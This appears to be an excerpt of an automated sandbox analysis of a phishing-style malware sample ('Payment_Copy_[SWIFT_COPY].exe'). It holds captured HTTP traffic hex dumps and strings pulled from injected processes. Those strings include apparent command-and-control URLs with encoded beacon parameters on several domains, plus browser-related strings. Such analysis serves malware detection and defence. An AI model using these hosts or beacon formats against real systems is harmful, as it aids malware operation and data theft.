b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:55 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:44:57 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8Data Raw: 53 01 5d c1 8c 64 a5 b3 07 40 33 70 5c 8f 75 de 7f be aa df 7f 4b 33 ef e3 ff 18 da 48 64 0c 40 00 58 45 9a 4a f7 d6 5b 7d b3 cd d6 72 20 12 94 90 b0 3d 02 6a a1 f9 97 6f 5a 2a 04 77 65 bc 0f 22 63 69 c0 3b 1f 24 b2 b9 0f 77 9f e9 56 fd f9 33 28 cd 00 e4 15 0c 59 05 12 7b a2 17 7d 15 79 a6 df 7b fd bb 67 fe 0c b0 70 74 38 b7 fe 8c 5b ee 39 63 23 45 91 b3 91 82 4c 51 f6 87 72 b8 6c 15 64 17 ea 31 54 bb fb 0d 22 72 15 97 a6 f5 fd 61 ad d7 ea 3d ba d7 94 a3 04 92 90 86 0f ea 2e 43 d5 d9 c9 5e bc 1f 03 92 38 5f 08 58 97 b1 ac 96 ce 77 37 ef 6e 0b 21 89 80 10 11 10 e3 c4 0c 02 a6 b7 73 ae 01 93 ee 99 21 d5 76 10 77 e2 68 83 6b 9f ce 90 68 dd 26 62 b6 d3 92 3e 44 07 1d 7f 62 20 6b 73 06 43 4f 49 b2 9f 42 c6 d1 76 3e 83 87 5a b7 df 61 50 75 86 a8 b2 96 29 c0 64 0f 1d 9a fe 20 f1 4b af 55 bb e6 1c 6d a1 2a f5 14 18 77 0c da ce 02 a3 0a d0 da a3 9c a7 f0 91 d5 4b ba 3d 80 27 0a 8e 78 26 08 6f ad f4 6c bf 59 3d 2e ad 1a 79 3d da c6 34 e9 f9 d9 4a 38 fa 02 2b 58 6f e7 a4 2e ae ca d6 00 9d 53 29 5b 1c 57 f4 2e ad d6 eb 7d b3 a5 b9 07 a2 13 54 3e a7 ea 5a 6b a8 f5 1c 92 bd 36 fb 94 68 77 23 20 21 b6 8a d6 6a d7 c2 54 19 d0 06 8f f0 42 f0 a8 54 c9 e0 e1 09 e5 c5 5a 2f 1f 7d 6b 44 05 fb f9 15 31 e4 38 ed 15 74 f1 f1 71 66 b6 73 7d 7f bb f9 a5 57 4d f7 4d 3f 29 6b 31 1c 85 0c 46 64 20 0b 5f 87 3a 2c 5d 6a 92 97 f5 cb da d0 0b de ce cb fe 37 dd 97 b5 8f e8 bd ac 5f 3f 8f 97 35 f7 29 a3 ec 65 1d 89 6b 24 5e d6 08 23 75 b5 28 41 c6 f9 1a 80 30 32 e7 03 ce 39 73 3e 3c 1e 36 e7 c3 97 97 6f 30 e7 1f ed 4e 43 a1 2e 1b 51 d1 b5 85 b4 55 b9 0d bc b7 58 72 f2 65 7d e9 89 cb 38 f4 b2 fe 66 0a b1 76 9b f8 9e 36 8d 95 1f f9 ac 86 2c a4 3e 15 68 9a d2 f9 fa ed dd 51 1e c0 c4 0e 81 36 b0 03 54 9b 04 95 8b 55 09 6f d7 f3 bb dd 85 0e 3b 1a b7 be f1 82 0e 1b ac d2 6d df 0b 85 a3 e6 ec 70 db be 60 b3 d1 93 3c d3 1f ca 58 93 28 1c 77 a6 12 ef ce d7 55 f0 d2 93 fa a5 72 dc 29 35 5d fa b8 ba f6 c9 76 83 3c 28 6a 94 fd ab 55 8d d3 61 8f 5f 52 2f 7d be ae 6e 8e 75 dd c1 d3 29 e5 8e d3 44 c2 44 df c5 96 bc 9e a2 de ee 93 f8 5d 15 d6 61 98 61 45 0b d9 9e a5 a1 8e c6 17 f1 71 b6 3e 09 17 2b 5a e9 ba fe 43 5d ad 63 31 c3 2c 9c 75 6d 46 e9 07 fe aa 5b eb 89 0f c3 20 6f 8e a2 07 65 3d f6 83 fe 2c ad 44 df a2 bb 02 be bc 5c 3c 64 0e 5d b7 b7 db 02 53 e4 03 53 cf d2 08 24 f7 23 3a a0 b0 0d 94 7f 15 50 59 96 0d cf 76 37 b9 4c fe ea 13 45 8e 4b 1d eb 8e 85 34 0a c5 b4 19 94 54 06 54 5f 2c 7a 39 95 b1 57 bc 9c ca aa f2 5e 4e 95 62 d5 cb 49 30 56 be 9c 44 28 a3 d2 d1 10 e8 ce fb 47 e0 be bb e3 c9 1d ea eb cb 4a fe bd ae 87 36 13 a2 10 68 2b 77 b9 7c ff b6 aa f2 bf 6d ef b3 eb
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:45:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:45:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:45:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:45:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: typeperf.exe, 00000006.00000002.3840171693.000000000469A000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003CAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://blessingstation.org/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000004508000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003B18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003878000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000002E88000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSx
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFiZTZiYj
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000041E4000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.00000000037F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000004508000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003B18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: Payment_Copy_[SWIFT_COPY].exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Payment_Copy_[SWIFT_COPY].exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003A0A000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000004052000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003662000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3841079742.0000000004CC6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3841079742.0000000004CC6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com/m858/
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
